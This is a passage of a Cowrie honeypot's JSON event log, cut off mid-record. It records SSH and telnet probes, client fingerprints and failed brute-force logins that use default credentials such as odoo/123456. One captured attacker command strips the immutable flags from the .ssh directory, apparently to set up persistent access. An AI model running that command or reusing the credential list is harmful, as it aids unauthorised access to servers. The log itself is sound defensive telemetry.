{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:13:56.382570Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T04:13:56.383645Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:13:56.626830Z","src_ip":"212.227.235.229","session":"3b1020f59a4b"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"123456","message":"login attempt [odoo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:13:56.951460Z","src_ip":"212.227.125.160","session":"481b87217190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54277,"dst_ip":"1.2.3.4","dst_port":23,"session":"544c79f52bb2","protocol":"telnet","message":"New connection: 212.227.125.160:54277 (1.2.3.4:23) [session: 544c79f52bb2]","sensor":"my-vps","timestamp":"2025-08-31T04:13:57.384443Z"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:13:58.314480Z","src_ip":"212.227.125.160","session":"481b87217190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33400,"dst_ip":"1.2.3.4","dst_port":23,"session":"3421fd0900ba","protocol":"telnet","message":"New connection: 212.227.235.229:33400 (1.2.3.4:23) [session: 3421fd0900ba]","sensor":"my-vps","timestamp":"2025-08-31T04:13:58.461574Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17829,"dst_ip":"1.2.3.4","dst_port":22,"session":"6721393f54e3","protocol":"ssh","message":"New connection: 212.227.235.229:17829 (1.2.3.4:22) [session: 6721393f54e3]","sensor":"my-vps","timestamp":"2025-08-31T04:14:02.911229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:14:02.912164Z","src_ip":"212.227.235.229","session":"6721393f54e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:14:03.180395Z","src_ip":"212.227.235.229","session":"6721393f54e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T04:14:04.285930Z","src_ip":"212.227.235.229","session":"6721393f54e3"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":39844,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3b032ad247b","protocol":"telnet","message":"New connection: 103.77.214.206:39844 (1.2.3.4:23) [session: a3b032ad247b]","sensor":"my-vps","timestamp":"2025-08-31T04:14:05.485578Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:05.560885Z","src_ip":"212.227.235.229","session":"6721393f54e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52345,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9818fbf09a3","protocol":"telnet","message":"New connection: 212.227.125.160:52345 (1.2.3.4:23) [session: d9818fbf09a3]","sensor":"my-vps","timestamp":"2025-08-31T04:14:09.582833Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35312,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e3c50902e3f","protocol":"ssh","message":"New connection: 212.227.235.229:35312 (1.2.3.4:22) [session: 2e3c50902e3f]","sensor":"my-vps","timestamp":"2025-08-31T04:14:11.159387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:14:11.160816Z","src_ip":"212.227.235.229","session":"2e3c50902e3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:14:11.472417Z","src_ip":"212.227.235.229","session":"2e3c50902e3f"}
{"eventid":"cowrie.login.failed","username":"bergold","password":"bergold","message":"login attempt [bergold/bergold] failed","sensor":"my-vps","timestamp":"2025-08-31T04:14:13.219010Z","src_ip":"212.227.235.229","session":"2e3c50902e3f"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":36729,"dst_ip":"1.2.3.4","dst_port":23,"session":"54052dd8a741","protocol":"telnet","message":"New connection: 103.77.214.206:36729 (1.2.3.4:23) [session: 54052dd8a741]","sensor":"my-vps","timestamp":"2025-08-31T04:14:13.621958Z"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:14.532307Z","src_ip":"212.227.235.229","session":"2e3c50902e3f"}
{"eventid":"cowrie.session.connect","src_ip":"103.77.214.206","src_port":33317,"dst_ip":"1.2.3.4","dst_port":23,"session":"e63d223ca35d","protocol":"telnet","message":"New connection: 103.77.214.206:33317 (1.2.3.4:23) [session: e63d223ca35d]","sensor":"my-vps","timestamp":"2025-08-31T04:14:17.847207Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56841,"dst_ip":"1.2.3.4","dst_port":23,"session":"f21f1a2daf68","protocol":"telnet","message":"New connection: 212.227.235.229:56841 (1.2.3.4:23) [session: f21f1a2daf68]","sensor":"my-vps","timestamp":"2025-08-31T04:14:21.906280Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36656,"dst_ip":"1.2.3.4","dst_port":22,"session":"02fba0e74357","protocol":"ssh","message":"New connection: 212.227.125.160:36656 (1.2.3.4:22) [session: 02fba0e74357]","sensor":"my-vps","timestamp":"2025-08-31T04:14:26.466494Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39782,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5f2c3e59d19","protocol":"ssh","message":"New connection: 212.227.235.229:39782 (1.2.3.4:22) [session: f5f2c3e59d19]","sensor":"my-vps","timestamp":"2025-08-31T04:14:32.565432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:14:33.366890Z","src_ip":"212.227.235.229","session":"f5f2c3e59d19"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:14:33.367838Z","src_ip":"212.227.235.229","session":"f5f2c3e59d19"}
{"eventid":"cowrie.session.closed","duration":46.515395641326904,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:34.743208Z","src_ip":"103.77.214.206","session":"6cd5d12cd56d"}
{"eventid":"cowrie.session.closed","duration":46.467122077941895,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:34.773779Z","src_ip":"212.227.235.229","session":"cd9b7ab9028f"}
{"eventid":"cowrie.session.closed","duration":46.47217106819153,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:34.776994Z","src_ip":"212.227.235.229","session":"f0411f561d4d"}
{"eventid":"cowrie.session.closed","duration":46.50481677055359,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:37.786952Z","src_ip":"212.227.125.160","session":"e67449f76038"}
{"eventid":"cowrie.session.closed","duration":46.51601028442383,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:38.792264Z","src_ip":"103.77.214.206","session":"dcc368a23c92"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"12345","message":"login attempt [odoo/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:14:39.618199Z","src_ip":"212.227.235.229","session":"f5f2c3e59d19"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:41.642004Z","src_ip":"212.227.235.229","session":"f5f2c3e59d19"}
{"eventid":"cowrie.session.closed","duration":46.49099135398865,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:43.875372Z","src_ip":"212.227.125.160","session":"544c79f52bb2"}
{"eventid":"cowrie.session.closed","duration":46.45894932746887,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:44.920452Z","src_ip":"212.227.235.229","session":"3421fd0900ba"}
{"eventid":"cowrie.session.closed","duration":"22.9","message":"Connection lost after 22.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:49.386703Z","src_ip":"212.227.125.160","session":"02fba0e74357"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123456","message":"login attempt [steam/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:14:50.804332Z","src_ip":"212.227.235.229","session":"5fa36bf9cf64"}
{"eventid":"cowrie.session.closed","duration":46.49623394012451,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:51.981729Z","src_ip":"103.77.214.206","session":"a3b032ad247b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57910,"dst_ip":"1.2.3.4","dst_port":22,"session":"551d305e1520","protocol":"ssh","message":"New connection: 212.227.125.160:57910 (1.2.3.4:22) [session: 551d305e1520]","sensor":"my-vps","timestamp":"2025-08-31T04:14:54.331548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:14:54.786426Z","src_ip":"212.227.125.160","session":"551d305e1520"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:14:54.787501Z","src_ip":"212.227.125.160","session":"551d305e1520"}
{"eventid":"cowrie.session.closed","duration":"94.6","message":"Connection lost after 94.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:55.415761Z","src_ip":"212.227.235.229","session":"5fa36bf9cf64"}
{"eventid":"cowrie.session.closed","duration":46.48427391052246,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:56.067029Z","src_ip":"212.227.125.160","session":"d9818fbf09a3"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"12345","message":"login attempt [odoo/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:14:56.818301Z","src_ip":"212.227.125.160","session":"551d305e1520"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:14:58.269743Z","src_ip":"212.227.125.160","session":"551d305e1520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33699,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0cfaea87757","protocol":"telnet","message":"New connection: 212.227.125.160:33699 (1.2.3.4:23) [session: b0cfaea87757]","sensor":"my-vps","timestamp":"2025-08-31T04:14:58.416601Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45944,"dst_ip":"1.2.3.4","dst_port":23,"session":"34e363b6117b","protocol":"telnet","message":"New connection: 212.227.235.229:45944 (1.2.3.4:23) [session: 34e363b6117b]","sensor":"my-vps","timestamp":"2025-08-31T04:14:58.470324Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43281,"dst_ip":"1.2.3.4","dst_port":23,"session":"93a1952f54d6","protocol":"telnet","message":"New connection: 212.227.125.160:43281 (1.2.3.4:23) [session: 93a1952f54d6]","sensor":"my-vps","timestamp":"2025-08-31T04:15:00.045823Z"}
{"eventid":"cowrie.session.closed","duration":46.49231028556824,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:00.114184Z","src_ip":"103.77.214.206","session":"54052dd8a741"}
{"eventid":"cowrie.session.closed","duration":45.36242628097534,"message":"Connection lost after 45 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:03.209537Z","src_ip":"103.77.214.206","session":"e63d223ca35d"}
{"eventid":"cowrie.session.connect","src_ip":"194.0.234.18","src_port":25156,"dst_ip":"1.2.3.4","dst_port":22,"session":"2869b40b6e33","protocol":"ssh","message":"New connection: 194.0.234.18:25156 (1.2.3.4:22) [session: 2869b40b6e33]","sensor":"my-vps","timestamp":"2025-08-31T04:15:07.129407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.8.1_DEV","message":"Remote SSH version: SSH-2.0-libssh2_1.8.1_DEV","sensor":"my-vps","timestamp":"2025-08-31T04:15:07.134140Z","src_ip":"194.0.234.18","session":"2869b40b6e33"}
{"eventid":"cowrie.client.kex","hassh":"2311efe7204dfc3007bb4ce758ac6a98","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc,none;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com,none;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc","none"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com","none"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2311efe7204dfc3007bb4ce758ac6a98","sensor":"my-vps","timestamp":"2025-08-31T04:15:07.148456Z","src_ip":"194.0.234.18","session":"2869b40b6e33"}
{"eventid":"cowrie.login.failed","username":"user","password":"USER","message":"login attempt [user/USER] failed","sensor":"my-vps","timestamp":"2025-08-31T04:15:07.252122Z","src_ip":"194.0.234.18","session":"2869b40b6e33"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:08.269258Z","src_ip":"194.0.234.18","session":"2869b40b6e33"}
{"eventid":"cowrie.session.closed","duration":46.38177800178528,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:15:08.287993Z","src_ip":"212.227.235.229","session":"f21f1a2daf68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46692,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bcbbc321d96","protocol":"ssh","message":"New connection: 212.227.235.229:46692 (1.2.3.4:22) [session: 6bcbbc321d96]","sensor":"my-vps","timestamp":"2025-08-31T04:15:09.054239Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59510,"dst_ip":"1.2.3.4","dst_port":23,"session":"73edadc2473b","protocol":"telnet","message":"New connection: 212.227.235.229:59510 (1.2.3.4:23) [session: 73edadc2473b]","sensor":"my-vps","timestamp":"2025-08-31T04:15:12.599764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:15:15.735855Z","src_ip":"212.227.235.229","session":"6bcbbc321d96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:15:15.737416Z","src_ip":"212.227.235.229","session":"6bcbbc321d96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46968,"dst_ip":"1.2.3.4","dst_port":22,"session":"776a3f549f70","protocol":"ssh","message":"New connection: 212.227.235.229:46968 (1.2.3.4:22) [session: 776a3f549f70]","sensor":"my-vps","timestamp":"2025-08-31T04:15:32.185798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:15:32.991657Z","src_ip":"212.227.235.229","session":"776a3f549f70"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:15:32.992551Z","src_ip":"212.227.235.229","session":"776a3f549f70"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser","message":"login attempt [esuser/esuser] failed","sensor":"my-vps","timestamp":"2025-08-31T04:15:33.035479Z","src_ip":"212.227.235.229","session":"6bcbbc321d96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42286,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b04f5b39ccf","protocol":"ssh","message":"New connection: 212.227.235.229:42286 (1.2.3.4:22) [session: 4b04f5b39ccf]","sensor":"my-vps","timestamp":"2025-08-31T04:15:35.404169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:15:35.405611Z","src_ip":"212.227.235.229","session":"4b04f5b39ccf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-stric